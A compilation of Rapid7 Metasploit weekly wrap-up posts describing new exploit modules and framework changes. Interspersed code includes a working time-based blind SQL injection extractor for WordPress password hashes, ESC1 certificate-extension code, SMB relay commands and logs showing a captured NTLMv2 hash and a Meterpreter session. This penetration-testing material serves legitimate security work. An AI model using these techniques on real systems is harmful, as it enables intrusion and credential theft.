All posts by Jeffrey Martin

Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2023/06/23/metasploit-weekly-wrap-up-16/

I like to MOVEit, MOVEit, We like to MOVEit!

Party hard just like it’s Mardi Gras! bwatters-r7 delivered the dance moves this week with a masterful performance. The windows/http/moveit_cve_2023_34362 module is available for all your party needs: exploiting CVE-2023-34362, it gets into the MOVEit Transfer database and nets shells to help you "Keep on jumpin’ off the floor"!

New module content (1)

MOVEit SQL Injection vulnerability

Authors: bwatters-r7, rbowes-r7, and sfewer-r7
Type: Exploit
Pull request: #18100 contributed by bwatters-r7
AttackerKB reference: CVE-2023-34362

Description: Adds a new module targeting the MOVEit Transfer web application that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.

Enhancements and features (7)

  • #18078 from zeroSteiner – This adds support to the auxiliary/admin/dcerpc/icpr_cert module for issuing certificates for an explicit SID by placing it in the NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2). This keeps ESC1 exploitable once the CA requires the SID to be present in issued certificates, the strong certificate mapping enforcement Microsoft introduced with KB5014754.
  • #18117 from smashery – This adds Windows 10 revision number extraction to the Windows version Post API.
  • #18118 from smashery – This PR updates the User Agent strings for June 2023.
  • #18119 from adfoster-r7 – This adds support for only running user specified test names in modules loaded by running loadpath test/modules.
  • #18126 from adfoster-r7 – This PR adds additional logging to the test/file module. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
  • #18127 from adfoster-r7 – This PR adds additional test/railgun_reverse_lookup tests for macOS and Linux.
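As an added illustration of the extension #18078 targets (example code written for this page, not Metasploit's own icpr_cert implementation), the Ruby below builds the NTDS_CA_SECURITY_EXT value for a chosen SID with OpenSSL's ASN.1 classes, reads the SID back out of a DER-encoded extension, and checks an issued certificate for it. The layout follows Microsoft's definition of the extension: OID 1.3.6.1.4.1.311.25.2 wrapping a GeneralNames with one OtherName of type 1.3.6.1.4.1.311.25.2.1 whose value is the textual SID as an OCTET STRING. The SID and subject name are made up, and the self-signed certificate only stands in for one an AD CS CA would issue.

```ruby
require 'openssl'

# OIDs Microsoft defined for the SID-carrying certificate extension:
# szOID_NTDS_CA_SECURITY_EXT and the szOID_NTDS_OBJECTSID OtherName type.
NTDS_CA_SECURITY_EXT_OID = '1.3.6.1.4.1.311.25.2'
NTDS_OBJECTSID_OID       = '1.3.6.1.4.1.311.25.2.1'
SID_PATTERN = /\AS-1-\d+(?:-\d+)+\z/

# DER-encode the whole X.509 Extension:
#   SEQUENCE { extnID OID, extnValue OCTET STRING }
# where extnValue wraps GeneralNames holding a single OtherName:
#   [0] { type-id szOID_NTDS_OBJECTSID, value [0] EXPLICIT OCTET STRING "S-1-5-..." }
def build_ntds_ca_security_ext(sid)
  raise ArgumentError, "not a textual SID: #{sid.inspect}" unless sid.match?(SID_PATTERN)

  other_name_body = [
    OpenSSL::ASN1::ObjectId.new(NTDS_OBJECTSID_OID),
    OpenSSL::ASN1::ASN1Data.new([OpenSSL::ASN1::OctetString.new(sid)], 0, :CONTEXT_SPECIFIC)
  ]
  # GeneralName.otherName is [0] IMPLICIT, so the SEQUENCE tag is replaced by [0].
  general_name  = OpenSSL::ASN1::ASN1Data.new(other_name_body, 0, :CONTEXT_SPECIFIC)
  general_names = OpenSSL::ASN1::Sequence.new([general_name])

  OpenSSL::ASN1::Sequence.new([
    OpenSSL::ASN1::ObjectId.new(NTDS_CA_SECURITY_EXT_OID),
    OpenSSL::ASN1::OctetString.new(general_names.to_der)
  ]).to_der
end

# Inverse: pull the SID back out of a DER-encoded extension, or nil if the
# extension carries no szOID_NTDS_OBJECTSID OtherName.
def sid_from_ntds_ca_security_ext(ext_der)
  ext = OpenSSL::ASN1.decode(ext_der)
  extn_id, extn_value = ext.value.first, ext.value.last # optional `critical` BOOLEAN sits between
  return nil unless extn_id.oid == NTDS_CA_SECURITY_EXT_OID

  OpenSSL::ASN1.decode(extn_value.value).value.each do |general_name|
    next unless general_name.tag == 0 && general_name.tag_class == :CONTEXT_SPECIFIC
    type_id, explicit_value = general_name.value
    next unless type_id.oid == NTDS_OBJECTSID_OID
    return explicit_value.value.first.value
  end
  nil
end

# The check a defender wants on an issued certificate: which SID did the CA
# bind to it? nil means the extension is absent (legacy, weak mapping only).
def sid_from_certificate(cert)
  ext = cert.extensions.find do |e|
    OpenSSL::ASN1::ObjectId.new(e.oid).oid == NTDS_CA_SECURITY_EXT_OID
  end
  ext && sid_from_ntds_ca_security_ext(ext.to_der)
end

# Stand-in for a CA-issued certificate (constructed, self-signed) carrying the
# extension, so the round trip can be exercised offline.
def self_signed_cert_with_sid(sid, subject: '/CN=test-user')
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial  = 1
  cert.subject = cert.issuer = OpenSSL::X509::Name.parse(subject)
  cert.public_key = key.public_key
  cert.not_before = Time.now
  cert.not_after  = cert.not_before + 3600
  cert.add_extension(OpenSSL::X509::Extension.new(build_ntds_ca_security_ext(sid)))
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  cert
end
```

With the SID on a certificate, a DC maps the certificate to the account by SID instead of by UPN or subject, which is why an ESC1 request that controls the SID (rather than only the subjectAltName) keeps working after enforcement.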

Bugs fixed (5)

  • #17576 from gwillcox-r7 – This fixes a bug where adding and deleting tags to multiple hosts was not functioning correctly.
  • #18049 from cgranleese-r7 – This PR updates Jenkins modules to work with newer versions. Previously they fell over with a CSRF failure and gave a false negative result.
  • #18094 from zeroSteiner – Fixes an edge case with windows/meterpreter/reverse_tcp where there was a small chance of an invalid stager being created.
  • #18104 from adfoster-r7 – This PR fixes an issue that falsely caused empty file reads on Meterpreter.
  • #18124 from adfoster-r7 – Fixes the broken test/extapi module. The module was facing issues returning clipboard data that pertained to the session being tested, this issue has been resolved. This module is useful for developers contributing enhancements or new functionality to Meterpreter and other payloads. It is available after running loadpath test/modules.
  • #18132 from jmartin-r7 – This reverts #17942, an AMSI bypass improvement for newer versions of Windows, because that change broke psexec.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2023/04/07/metasploit-weekly-wrap-up-5/

The tide rolls in and out.

The flood of new modules last week crested leaving ample time for documentation updates this week. The team and the community seem to have focused on getting those sweet sprinkles of information that help everyone understand Metasploit out to the world.

Enhancements and features (1)

  • #17458 from steve-embling – Updates the exploit/multi/misc/weblogic_deserialize_badattrval module to enable support for SSL/TLS.

Bugs fixed (4)

  • #17778 from adfoster-r7 – Updates the Metasploit database migration code to no longer break the test suite when running locally.
  • #17823 from bcoles – This fixes an issue in the check method where targets with files containing no PHP code were falsely reported as safe.
  • #17835 from bcoles – Fixes a bug in auxiliary/admin/networking/cisco_dcnm_auth_bypass where the bypass_auth method would break if a user supplied a TARGETURI path without a trailing /.
  • #17844 from SubcomandanteMeowcos – Fixes broken documentation references in the secretsdump, zemra_panel_rce, and windows/gather/credentials/skype modules.

Documentation added (6)

  • #17836 from jheysel-r7 – Documents the usage of session.platform in the How to get started with writing a post-module documentation.
  • #17837 from cdelafuente-r7 – Updates the ‘How to write a check method’ page to include using the Msf::Exploit::Remote::AutoCheck mixin, which will automatically run a check method against a target before attempting to exploit it.
  • #17838 from zeroSteiner – Updates the How to use railgun for windows post exploitation documentation with the latest conventions for using Meterpreter’s Railgun when wanting to interact with Windows APIs on a remote target.
  • #17840 from jheysel-r7 – Updates the ‘Get started writing an Exploit’ example documentation to describe the usage of Stability/Reliability/SideEffects metadata when writing modules.
  • #17841 from jheysel-r7 – Documents the latest labels that can be assigned to pull requests.
  • #17842 from bwatters-r7 – Updates the How to use command stagers documentation with additional examples and clearer descriptions.

You can always find more documentation on our docsite at docs.metasploit.com.


Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2023/01/20/metasploit-weekly-wrap-up-189/

See something say something

Have an idea on how to expand on Metasploit Documentation on https://docs.metasploit.com/? Did you see a typo or some other error on the docs site? Thanks to adfoster-r7, submitting an update to the documentation is as easy as clicking the ‘Edit this page on GitHub’ link on the page you want to change. The new link will take you directly to the source in Metasploit’s GitHub so you can quickly locate the Markdown and submit a PR.

New module content (3)

Mirage firewall for QubesOS 0.8.0-0.8.3 Denial of Service (DoS) Exploit

Author: Krzysztof Burghardt
Type: Auxiliary
Pull request: #17348 contributed by burghardt
AttackerKB reference: CVE-2022-46770

Description: This PR adds a module that performs a DoS attack on Mirage Firewall versions 0.8.0-0.8.3.

WordPress Paid Membership Pro code Unauthenticated SQLi

Authors: Joshua Martinelle and h00die
Type: Auxiliary
Pull request: #17479 contributed by h00die
AttackerKB reference: CVE-2023-23488

Description: This adds an auxiliary module that leverages an unauthenticated SQL injection in the WordPress plugin Paid Membership Pro. The vulnerability is identified as CVE-2023-23488 and affects versions prior to 2.9.8. The module retrieves WordPress usernames and password hashes using a time-based blind SQL injection technique.
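The time-based blind technique the module relies on, as an added example (written for this page, not the module's code): the only signal is whether the response was delayed, so each byte of the secret is recovered with a binary search of eight "is byte N greater than X?" questions. The probe assumes WordPress' standard wp_users table and MySQL's SLEEP(); the row standing in for the target site is constructed so the extraction runs offline, and a timing-based oracle wrapper shows how the same extractor would drive real requests.

```ruby
# Delay the injected query asks for; the oracle treats any response that
# takes at least this long as "condition true".
DELAY_SECONDS = 3

# MySQL/MariaDB payload for one yes/no question about one byte. Table and
# column names are WordPress' defaults; `row` picks the wp_users row.
def mysql_probe(position, threshold, column: 'user_pass', table: 'wp_users', row: 0)
  "(SELECT IF(ORD(SUBSTRING((SELECT #{column} FROM #{table} LIMIT #{row},1)," \
    "#{position},1))>#{threshold},SLEEP(#{DELAY_SECONDS}),0))"
end

# Turns a request-sending callable into a boolean oracle by timing it.
# send_request.call(payload) must place the payload in the injectable parameter.
def timing_oracle(send_request, column:, row: 0)
  lambda do |position, threshold|
    started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
    send_request.call(mysql_probe(position, threshold, column: column, row: row))
    Process.clock_gettime(Process::CLOCK_MONOTONIC) - started >= DELAY_SECONDS
  end
end

# Generic extractor: oracle.call(position, threshold) => true iff byte > threshold.
# ORD() of a position past the end of the string is 0, which ends the loop.
def extract_via_oracle(oracle, max_len: 128)
  result = ''.b
  (1..max_len).each do |pos|
    lo, hi = 0, 255
    while lo < hi                      # 8 comparisons narrow 0..255 to one value
      mid = (lo + hi) / 2
      if oracle.call(pos, mid)
        lo = mid + 1
      else
        hi = mid
      end
    end
    return result if lo.zero?
    result << lo.chr
  end
  result
end

# Constructed stand-in for the vulnerable site: answers exactly as the timing
# oracle would, without sleeping. The phpass hash is made up.
FAKE_WP_USERS = [
  { 'user_login' => 'admin', 'user_pass' => '$P$BkTeK1nF7x0c3lB0yOWAxVe7P9zwDu1' }
].freeze

def simulated_oracle(column, row: 0, counter: nil)
  value = FAKE_WP_USERS.fetch(row).fetch(column)
  lambda do |position, threshold|
    counter[:requests] += 1 if counter
    (value.bytes[position - 1] || 0) > threshold
  end
end
```

Cost is what makes this slow in practice: a 5-character username needs 48 requests (8 per byte plus 8 to find the terminator), each stalled by DELAY_SECONDS when the answer is yes, and a 34-character phpass hash needs 280. That request volume, all from one client against one endpoint, is also the detection opportunity for the defender.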

Ivanti Cloud Services Appliance (CSA) Command Injection

Authors: Jakub Kramarz and h00die-gr3y
Type: Exploit
Pull request: #17449 contributed by h00die-gr3y
AttackerKB reference: CVE-2021-44529

Description: A new module has been added for CVE-2021-44529, an unauthenticated code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512. Successful exploitation requires sending a crafted cookie to the client endpoint at /client/index.php to get command execution as the nobody user.

Enhancements and features (5)

  • #17343 from h00die – This makes performance improvements to the windows/local/unquoted_service_path module.
  • #17451 from h00die – This adds netntlm and netntlmv2 hashes support to auxiliary/analyze/crack_windows module.
  • #17466 from prabhatjoshi321 – This updates the auxiliary/scanner/smb/smb_version module to store additional service information in the database so it can be viewed later.
  • #17473 from adfoster-r7 – Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
  • #17480 from h00die – A new exploit alias has been added for payloads. It performs the same action as to_handler, so users familiar with exploit modules can open a handler for a payload with the same exploit command.

Bugs fixed (3)

  • #17385 from smashery – This fixes the file write and file append methods to return the expected Boolean values rather than nil.
  • #17482 from adfoster-r7 – Fixes a connection issue with reverse_https stagers executed on Windows servers that attempt to negotiate TLS 1.0 when Metasploit is using OpenSSL 3.
  • #17491 from zeroSteiner – A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.


Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/09/23/metasploit-weekly-wrap-up-177/

Have you built out that awesome media room?

If your guilty pleasures include using a mobile device to make your home entertainment system WOW your guests, you might be using Unified Remote. I hope you are extra cautious about what devices you let on that WiFi network. Prolific community member h00die added a module this week that uses a recently published vulnerability from H4RK3NZ0: it leverages an unprotected configuration page exposed by the media service and, combined with just a little bit of protocol knowledge, makes that media server a prime target for pranks and other less friendly activities by guests on the network.

Finding the needles in that Linux memory stack

Brought to you by the combined efforts of many members of the Metasploit community, Linux Meterpreter payloads now offer a new way to hunt down passwords in memory on all those delicious Linux sessions you gather with Metasploit. The new post/linux/gather/mimipenguin module hunts down clear text passwords in Linux memory, based on MimiPenguin.

We all love to share code with the public

A new module this week makes sharing public code risky business if you are using Bitbucket Server to host that repository. Check out the nitty gritty in our blog post from earlier this week.

Metasploit plays well with others

Last week’s update brought with it an awesome way to use Metasploit with payloads generated by Sliver, which even earned a call out in their latest release notes. Great to see the community promoting these updates for more people to learn about and use.

New module content (4)

Enhancements and features (6)

  • #16940 from adfoster-r7 – Rewrites Metasploit’s datastore to fix multiple bugs and edge cases. The unset command will now consistently unset previously set datastore values, so that default values are used once again. Explicitly clearing a datastore value can be done with the set --clear OptionName command. Modules that require protocol specific option names such as SMBUser/FTPUser/BIND_DN/etc can now be consistently set with just username/password/domain options, i.e. set username Administrator instead of set SMBUser Administrator. This rewrite is currently behind a feature flag which can be enabled with features set datastore_fallbacks true.
  • #17002 from bcoles – The lib/msf/core/post/windows/accounts.rb, lib/msf/core/post/windows/ldap.rb, and lib/msf/core/post/windows/wmic.rb libraries have been updated to replace calls to load_extapi with ExtAPI compatibility checks which will check if the session supports ExtAPI, since if the sessions supports ExtAPI, it should already be loaded.
  • #17003 from bcoles – enum_patches has had its code updated to output the enumerated patches as a table and store the results long term in a CSV file. Additionally, a check has been added to verify that the current session supports the required Meterpreter extension before trying to run the module. Finally, the code and documentation have been cleaned up and modernized.
  • #17015 from jmartin-r7 – Updates auxiliary/scanner/http/http_login to report login success when the http status code is in the range 200,201,300-308. This functionality is user-configurable with set HttpSuccessCodes 200.
  • #17049 from bcoles – Adds Notes module meta information and replaces custom get_members method with get_members_from_group from the Post API.
  • #17051 from bcoles – Adds module documentation, notes for module meta information, and improves module error handling.

Bugs fixed (3)

  • #17023 from zeroSteiner – The post/windows/manage/rollback_defender_signatures module has been updated to work on WoW64 sessions, and has had its code updated so that the default action is now a valid option.
  • #17036 from zeroSteiner – Fixes a bug where the sessions command would show the connection as coming from localhost 127.0.0.1, instead of the correct peer host address for reverse_http Meterpreter sessions.
  • #17052 from adfoster-r7 – Fixes an error in Metasploit-framework when the host machine has OpenSSL 3.


Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/08/12/metasploit-weekly-wrap-up-171/

Putting in the work!

This week we’re extra grateful for the fantastic contributions our community makes to Metasploit. The Metasploit team landed more than 5 PRs each from Ron Bowes and bcoles, adding some great new capabilities.

Ron Bowes contributed four new modules targeting UnRAR, Zimbra, and ManageEngine ADAudit Plus. These modules offer Metasploit users some excellent new vectors to leverage against targets.

Contributions from bcoles offer improvements to various session interactions to make gathering data on targets more robust and consistent.

Have you seen Cassandra?

Are you using tools to visualize your data? If you are using cassandra-web, a tool made specifically to help you "see" what Cassandra holds, there are new toys for attackers to use to access much more. The new module from krastanoel targets cassandra-web <= 0.5.0 with a directory traversal to read lots of those sensitive details off the target.

New module content (6)

  • Cassandra Web File Read Vulnerability by Jeremy Brown and krastanoel – This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges.
  • UnRAR Path Traversal (CVE-2022-30333) by Ron Bowes and Simon Scannell, which exploits CVE-2022-30333 – This is the first of two modules for CVE-2022-30333, a symlink-based path traversal vulnerability in unRAR 6.11 and earlier (open-source version 6.1.6 and earlier). It creates a .rar whose entries abuse the symlink handling so that a vulnerable unRAR extracts an arbitrary payload to an arbitrary location.
  • Webmin Package Updates RCE by Christophe De La Fuente and Emir Polat, which exploits CVE-2022-36446 – This module exploits an arbitrary command injection in Webmin versions prior to 1.997.
  • UnRAR Path Traversal in Zimbra (CVE-2022-30333) by Ron Bowes and Simon Scannell, which exploits CVE-2022-30333 – The second of the two CVE-2022-30333 modules specifically targets Zimbra versions 9.0.0 Patch 24 (and earlier) and 8.8.15 Patch 31 (and earlier). These versions use unRAR to scan incoming email, and arbitrary command execution is possible if the unRAR installed on the OS is vulnerable to the same symlink-based path traversal. This module generates the .rar file that then needs to be emailed to the vulnerable Zimbra server to trigger the payload.
  • Zimbra zmslapd arbitrary module load by Darren Martyn and Ron Bowes, which exploits CVE-2022-37393 – This PR adds a local exploit for Zimbra to go from the zimbra user to root by using a sudo-able executable that can load an arbitrary .so file.
  • ManageEngine ADAudit Plus CVE-2022-28219 by Naveen Sunkavally and Ron Bowes, which exploits CVE-2022-28219 – This adds a module that chains a Java deserialization, a directory traversal, and a blind XXE injection vulnerability to gain unauthenticated code execution against vulnerable versions of ManageEngine ADAudit Plus.

Enhancements and features (6)

  • #16800 from adfoster-r7 – This adds support for OpenSSL 3 compatibility with legacy ciphers.
  • #16841 from bcoles – This updates the post/windows/gather/enum_powershell_env module with a code cleanup and expands the module to support non-Meterpreter session types such as shell sessions and PowerShell sessions.
  • #16873 from bcoles – This PR cleans up enum_artifacts, adds documentation, error handling, YAML file parsing, and support for non-meterpreter sessions.
  • #16875 from bcoles – This PR removes the enum_putty Meterpreter script in favor of the existing post module.
  • #16876 from bcoles – Removed the enum_logged_on_users Meterpreter script in favor of the existing post module.
  • #16878 from bcoles – Adds partial support for non-Meterpreter sessions for the enum_logged_on_users post module as well as makes use of the read_profile_list method. Resolves Rubocop and msftidy_docs violations.

Bugs fixed (1)

  • #16872 from bcoles – This PR fixes shell_registry_getvalinfo which was truncating registry values at the first space and normalize_key which was causing a crash when only a hive name was passed to the function when running on a shell session.


Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/06/03/metasploit-weekly-wrap-up-160/

Ask and you may receive

Module suggestions for the win: this week we see a new module written by jheysel-r7 for CVE-2022-26352, which happens to have been suggested by jvoisin in the issue queue last month. This module targets an arbitrary file upload in dotCMS versions before 22.03, 5.3.8.10, and 21.06.7 to obtain shells. Make sure you have permission to target this vulnerability before testing it, as one blog post suggests some banking sites may rely on this tool.

Everything comes full circle

As the GSoC 2022 program starts to ramp up, a contributor that participated in 2020, red0xff, contributed an enhancement to SQLi library support to give module writers a quicker path to injection on Microsoft SQL. The enhancement updates the auxiliary/gather/billquick_txtid_sqli module to showcase library utility and can reduce logic code required in modules significantly—saving about 20% in this one instance.

New module content (2)

  • DotCMS RCE via Arbitrary File Upload by Hussein Daher, Shubham Shah, and jheysel-r7, which exploits CVE-2022-26352 – Adds an exploit module that leverages CVE-2022-26352, an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, and 21.06.7, that allows an attacker to execute arbitrary code remotely in the context of the user running the application. The module uploads a .jsp payload to the tomcat ROOT directory and accesses it to trigger its execution.
  • MyBB Admin Control Code Injection RCE by Altelus, Christophe De La Fuente, and Cillian Collins, which exploits CVE-2022-24734 – Adds an exploit module that leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application. Authentication to the MyBB Admin Control Panel is required for this exploit to work, and the account must have rights to add or update settings.

Enhancements and features (2)

  • #16435 from red0xff – This adds support for Microsoft SQL Server to the SQL injection library. Additionally, this updates the auxiliary/gather/billquick_txtid_sqli module to leverage the new library features for exploitation.
  • #16492 from h00die – Improves the nfs_mount scanner module by detecting if a NFS network share is mountable or not based on the provided IP address and hostname.

Bugs fixed (2)

  • #16621 from sjanusz-r7 – Fixes a bug where running multi/manage/shell_to_meterpreter to upgrade from a Python Meterpreter session to a Native Meterpreter session would kill the original Meterpreter session.
  • #16640 from zeroSteiner – A bug has been fixed where the Net::LDAP library would fail due to the socket returning less data than was requested. This was addressed by introducing a custom read() method to appropriately handle cases where the socket may return less data than was expected.


Metasploit Weekly Wrap-Up

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2022/03/11/metasploit-weekly-wrap-up-3/

Mucking out the pipes.

Thanks to some quick work by timwr, CVE-2022-0847 aka "Dirty Pipe" gives Metasploit a bit of digital plumber’s training. The exploit, which targets Linux 5.8 and later kernels that predate the fixes in 5.16.11, 5.15.25 and 5.10.102, elevates user privileges by overwriting a SUID binary of your choice, plunging some payload gold through a pipe.
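A triage check for the kernel window Dirty Pipe affects, as an added example (written for this page, not part of the post or of the module): it classifies a `uname -r` style release string against the upstream versions that introduced and fixed the bug. The version numbers are the upstream ones; distributions backport fixes without changing the version string, and 5.17 release candidates before rc6 report as 5.17 but were affected, so treat the answer as a reason to test with the module, not as proof either way.

```ruby
# Dirty Pipe (CVE-2022-0847) entered mainline in Linux 5.8 and was fixed in
# 5.16.11, 5.15.25 and 5.10.102. Kernel lines in between those LTS series
# (5.8, 5.9, 5.11 to 5.14) were end-of-life before the fix and never got it
# upstream, so any patch level of those lines counts as vulnerable here.
FIRST_FIXED_PATCH = { 10 => 102, 15 => 25, 16 => 11 }.freeze

# True when the release string falls inside the vulnerable window. Only the
# leading major.minor[.patch] is parsed; suffixes such as "-generic",
# "-40-generic" or ".el8.x86_64" are ignored. Raises on unparseable input
# rather than silently answering "not vulnerable".
def dirty_pipe_vulnerable?(release)
  m = release.match(/\A(\d+)\.(\d+)(?:\.(\d+))?/)
  raise ArgumentError, "unparseable kernel release: #{release.inspect}" unless m

  major, minor, patch = m[1].to_i, m[2].to_i, m[3].to_i
  return false unless major == 5 && minor.between?(8, 16)

  fixed = FIRST_FIXED_PATCH[minor]
  fixed.nil? || patch < fixed
end
```

Running it against the output of `uname -r` on a session is enough for a first pass; the module's own check is the authoritative answer because it exercises the pipe behaviour rather than the version string.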

Long live the SMB relay!

SMB, that magical ubiquitous service making all that noise on networks, just got even more fun. With the latest updates by adfoster-r7, the windows/smb/smb_relay module that had been languishing in disuse due to evolutions in the protocol is now more helpful than ever. Users can now relay over SMB versions 2 and 3, and even select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.

Example module usage:

use windows/smb/smb_relay
set RELAY_TARGETS 192.168.123.4 192.168.123.25
set JOHNPWFILE ./relay_results.txt
run

Incoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:

msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22
[*] Received request for \admin
[*] Relaying to next target smb://192.168.123.4:445
[+] identity: \admin - Successfully authenticated against relay target smb://192.168.123.4:445
[SMB] NTLMv2-SSP Client     : 192.168.123.4
[SMB] NTLMv2-SSP Username   : \admin
[SMB] NTLMv2-SSP Hash       : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000

[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Selecting PowerShell target
[*] Received request for \admin
[*] identity: \admin - All targets relayed to
[*] 192.168.123.4:445 - Executing the payload...
[+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 192.168.123.4
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000

A session will be opened on the relay target with the associated credentials:

msf6 exploit(windows/smb/smb_relay) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.4:52771  (192.168.123.4)

Further details can be found in the Metasploit SMB Relay documentation.
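An added example, not part of the original post or of the module: the captured hash above is in the user:uid:domain:server_challenge:NTProofStr:blob form the module writes to JOHNPWFILE, and its blob is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP, whose AV_PAIRs say quite a lot about the client and about why the relay worked. The Ruby below parses that line (copied verbatim from the output above as the sample input) into its fields and AV pairs; the AV ids and the MsvAvFlags bits are the ones MS-NLMP defines, and relay_notes is my own summary of the relay-relevant parts.

```ruby
# Sample input: the NTLMv2-SSP hash line from the module output above.
CAPTURED = 'admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000'

# AV_PAIR ids (MS-NLMP 2.2.2.1) and which of them carry UTF-16LE strings.
AV_IDS = {
  0 => :MsvAvEOL, 1 => :MsvAvNbComputerName, 2 => :MsvAvNbDomainName,
  3 => :MsvAvDnsComputerName, 4 => :MsvAvDnsDomainName, 5 => :MsvAvDnsTreeName,
  6 => :MsvAvFlags, 7 => :MsvAvTimestamp, 8 => :MsvAvSingleHost,
  9 => :MsvAvTargetName, 10 => :MsvAvChannelBindings
}.freeze
UTF16_AVS = %i[MsvAvNbComputerName MsvAvNbDomainName MsvAvDnsComputerName
               MsvAvDnsDomainName MsvAvDnsTreeName MsvAvTargetName].freeze
AV_FLAG_CONSTRAINED   = 0x1 # account authentication is constrained
AV_FLAG_MIC_PRESENT   = 0x2 # client computed a MIC over the handshake
AV_FLAG_UNTRUSTED_SPN = 0x4 # target SPN came from an untrusted source

WINDOWS_EPOCH_OFFSET = 116_444_736_000_000_000 # 100ns ticks from 1601-01-01 to 1970-01-01

def filetime_to_time(ticks)
  Time.at(Rational(ticks - WINDOWS_EPOCH_OFFSET, 10_000_000)).utc
end

def parse_netntlmv2(line)
  user, _uid, domain, challenge_hex, proof_hex, blob_hex = line.strip.split(':', 6)
  blob = [blob_hex].pack('H*')
  raise ArgumentError, 'blob shorter than the fixed NTLMv2 header' if blob.bytesize < 28

  # RespType, HiRespType, Reserved1, Reserved2, TimeStamp, ChallengeFromClient, Reserved3
  resp_type, hi_resp_type, _r1, _r2, timestamp, client_challenge, _r3 = blob.unpack('CCvVQ<a8V')
  raise ArgumentError, 'not an NTLMv2 response' unless resp_type == 1 && hi_resp_type == 1

  av_pairs = {}
  offset = 28
  while offset + 4 <= blob.bytesize
    av_id, av_len = blob[offset, 4].unpack('vv')
    offset += 4
    name = AV_IDS.fetch(av_id) { :"MsvAvUnknown#{av_id}" }
    break if name == :MsvAvEOL
    value = blob[offset, av_len]
    raise ArgumentError, "truncated #{name}" if value.nil? || value.bytesize < av_len
    offset += av_len
    av_pairs[name] =
      if UTF16_AVS.include?(name) then value.force_encoding('UTF-16LE').encode('UTF-8')
      elsif name == :MsvAvFlags then value.unpack1('V')
      elsif name == :MsvAvTimestamp then filetime_to_time(value.unpack1('Q<'))
      else value.unpack1('H*') # SingleHost, ChannelBindings and unknown ids kept as hex
      end
  end

  { user: user, domain: domain, server_challenge: challenge_hex, nt_proof_str: proof_hex,
    timestamp: filetime_to_time(timestamp), client_challenge: client_challenge.unpack1('H*'),
    av_pairs: av_pairs }
end

# What the capture says about relay protections on the client side.
def relay_notes(parsed)
  av = parsed[:av_pairs]
  flags = av.fetch(:MsvAvFlags, 0)
  cb = av[:MsvAvChannelBindings]
  { mic_present: (flags & AV_FLAG_MIC_PRESENT) != 0,
    spn_claimed: av[:MsvAvTargetName],
    channel_bindings_present: !cb.nil? && cb != '00' * 16 }
end
```

Two details in this capture matter for relay. MsvAvTargetName is cifs/192.168.123.1, the Metasploit host rather than the real target, so a relay target that validated the client's target SPN against its own names would have rejected this authentication. MsvAvChannelBindings is sixteen zero bytes, meaning the client bound the authentication to no TLS channel, which is what makes relaying to services with Extended Protection for Authentication fail and relaying to plain SMB succeed. The timestamp in the blob also dates the handshake to within seconds of the session open time shown above.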

Return of the GSoC!
